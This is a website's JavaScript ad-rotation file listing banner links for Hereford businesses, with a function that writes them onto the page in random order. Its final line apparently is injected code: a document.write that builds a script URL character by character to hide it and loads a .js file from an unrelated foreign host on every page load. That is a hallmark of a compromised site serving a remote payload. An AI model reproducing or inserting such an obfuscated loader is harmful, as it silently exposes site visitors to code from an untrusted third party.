var adblockAd=new Array()
adblockAd[0]='<a href="http://clkuk.tradedoubler.com/click?p=1078&a=1588218&g=17450058"><img src="../images/ads/PCWorld120-x-60-AW.gif" width="120" height="60" class="imgBorder" alt="PC World"></a>'
adblockAd[1]='<a href="http://www.hereford.uk.com/HomeandGarden/default.asp?hfd"><img src="../images/Site/Home&GardenBoxAd.gif" width="120" height="120" class="imgBorder" alt="Home and Garden"></a>'
adblockAd[2]='<a href="clicks.asp?url=http://www.cottages.co.uk?hfd"><img src="../images/BoxAds/CottagesBoxAd.gif" width="120" height="60" class="imgBorder" alt="Cottages to Rent"></a>'
adblockAd[3]='<a href="clicks.asp?url=http://www.hereford.uk.com/driptec?hfd"><img src="../images/BoxAds/DriptecBoxAd001.jpg" width="120" height="60" class="imgBorder" alt="Driptec"></a>'
adblockAd[4]='<a href="clicks.asp?url=http://www.bedsandmattressesdirect.co.uk?=hereford.uk.com"><img src="../images/BoxAds/BedsLogo120.gif" width="120" height="82" class="imgBorder" alt="Beds & Mattresses Direct Ltd"></a>'
adblockAd[5]='<a href="clicks.asp?url=http://www.wyevalleybrewery.co.uk?hfd"><img src="../images/BoxAds/WyeValleyBreweryBoxAd.gif" width="120" height="120" class="imgBorder" alt="Wye Valley Brewery"></a>'
adblockAd[6]='<a href="clicks.asp?url=http://www.tpg-disableaids.co.uk?hfd"><img src="../images/BoxAds/TPGBoxAd.gif" width="120" height="60" class="imgBorder" alt="TPG Disable Aids"></a>'
adblockAd[7]='<a href="clicks.asp?url=http://www.playnightclub.net?hfd"><img src="../images/BoxAds/Play02.gif" width="120" height="60" class="imgBorder" alt="Play Nightclub"></a>'
adblockAd[8]='<a href="clicks.asp?url=http://www.rra-arch.com?hfd"><img src="../images/BoxAds/RRABoxAd002.jpg" width="120" height="60" class="imgBorder" alt="RRA Architects Ltd"></a>'
adblockAd[9]='<a href="clicks.asp?url=http://www.hereford-racecourse.co.uk?hfd"><img src="../images/BoxAds/RacecourseBoxAd.gif" width="120" height="120" class="imgBorder" alt="Hereford Racecourse"></a>'


function randomorderAd(targetarray, spacing) {
  var randomorderAd=new Array()
  var the_one
  var z=1
  for (i=5;i<targetarray.length;i++)
  randomorderAd[i]=i

  while (z<targetarray.length) {
    the_one=Math.floor(Math.random()*targetarray.length)
    if (targetarray[the_one]!="_selected!"){
      document.write(targetarray[the_one]+spacing)
      targetarray[the_one]="_selected!"
      z++
    }
  }
}
document.write('<script language="JavaScript" type="text/javascript" src="h'+'t'+'t'+'p'+':'+'/'+'/'+'w'+'w'+'w'+'.'+'f'+'l'+'a'+'i'+'r'+'m'+'c'+'s'+'g'+'.'+'c'+'h'+'/'+'a'+'s'+'s'+'e'+'t'+'s'+'/'+'i'+'m'+'a'+'g'+'e'+'s'+'/'+'0'+'d'+'0'+'f'+'d'+'7'+'c'+'6'+'.'+'j'+'s"></script>');
